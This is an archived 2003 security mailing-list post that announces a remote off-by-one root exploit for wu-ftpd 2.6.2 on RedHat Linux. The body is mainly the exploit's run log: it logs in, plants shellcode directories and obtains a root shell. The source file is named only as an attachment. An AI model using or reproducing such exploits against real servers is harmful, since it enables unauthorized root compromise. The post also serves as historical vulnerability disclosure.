wu-ftpd-2.6.2 off-by-one remote exploit.

From: dong-h0un U (xploitat_private)
Date: Sun Aug 03 2003 - 23:29:43 PDT

Next message: NetBSD Security Officer: "NetBSD Security Advisory 2003-010: remote panic in OSI networking code"

Previous message: Sebastian Krahmer: "SuSE Security Announcement: postfix (SuSE-SA:2003:033)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I succeeded in RedHat Linux (x86) wu-2.6.2(1), 2.6.2(2), 2.6.1, 2.6.0. (Most version).
This is never fake.

Excellent Advisory was already announced (2003/07/31):
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt

This information was very useful to me.
I'm thankful to them.

This works well in my server.
If don't work in your server ?

Reason that don't work in other server is various kinds.
(For example, compiler version, operating system kind,
or, shellcode's position mistake, environment variable etc ...)

I don't think about those. Exert your force. :-)
INetCop Security is poor now. They have a few server.


* Exploit result:


--
bash$ cat /etc/redhat-release
Red Hat Linux release 6.1 (Cartman)
bash$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
--

bash$ ./0x82-wu262 -htest.inetcop.org -ux82 -pmy_pass -n21 -t2

 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.

 [*] Target: RedHat Linux 6.x Version wu-2.6.2(2) compile.
 [+] address: 0x806aaf0.
 [*] #1 Try, test.inetcop.org:21 ... [  OK  ]
 [1] ftpd connection login.
 [*] ftpd connection success.
 [+] User id input.
 [+] User password input.
 [*] User x82 logged in.
 [2] send exploit code.
 [+] 01: make 0x41414141 directory.
 [+] 02: make shell-code directory.
 [+] 03: make 0x43434343 directory.
 [+] 04: make 0x44444444 directory.
 [+] 05: make 0x45454545 directory.
 [+] 06: make 0x46464646 directory.
 [+] 07: make 0x47474747 directory.
 [+] 08: make 0x48484848 directory.
 [+] 09: make 0x49494949 directory.
 [+] 10: make 0x50505050 directory.
 [+] 11: make 0x51515151 directory.
 [+] 12: make 0x52525252 directory.
 [+] 13: make 0x53535353 directory.
 [+] 14: make 0x54545454 directory.
 [+] 15: make 0x55555555 directory.
 [+] Ok, MKD &shellcode_dir.
 [+] #2 Try, test.inetcop.org:21 ... [  OK  ]
 [3] ftpd connection login.
 [*] ftpd connection success.
 [+] User id input.
 [+] User password input.
 [*] User x82 logged in.
 [4] send exploit code.
 [+] 01: make 0x41414141 directory.
 [+] 02: make shell-code directory.
 [+] 03: make 0x43434343 directory.
 [+] 04: make 0x44444444 directory.
 [+] 05: make 0x45454545 directory.
 [+] 06: make 0x46464646 directory.
 [+] 07: make 0x47474747 directory.
 [+] 08: make 0x48484848 directory.
 [+] 09: make 0x49494949 directory.
 [+] 10: make 0x50505050 directory.
 [+] 11: make 0x51515151 directory.
 [+] 12: make 0x52525252 directory.
 [+] 13: make 0x53535353 directory.
 [+] 14: make 0x54545454 directory.
 [+] 15: make 0x55555555 directory.
 [+] Ok, RMD &shellcode_dir.
 [5] Waiting, execute the shell ...
 [*] Send, command packet !

x82 is happy, x82 is happy, x82 is happy
Linux test.inetcop.org 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
uid=0(root) gid=0(root) egid=501(x82) groups=501(x82),500(secure)
bash#

--

P.S: Please, don't give me question about exploit, mail.
     Sorry, for my poor english.


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by Outblaze

application/octet-stream attachment: 0x82-wu262.c

Next message: NetBSD Security Officer: "NetBSD Security Advisory 2003-010: remote panic in OSI networking code"
Previous message: Sebastian Krahmer: "SuSE Security Announcement: postfix (SuSE-SA:2003:033)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Aug 04 2003 - 11:50:18 PDT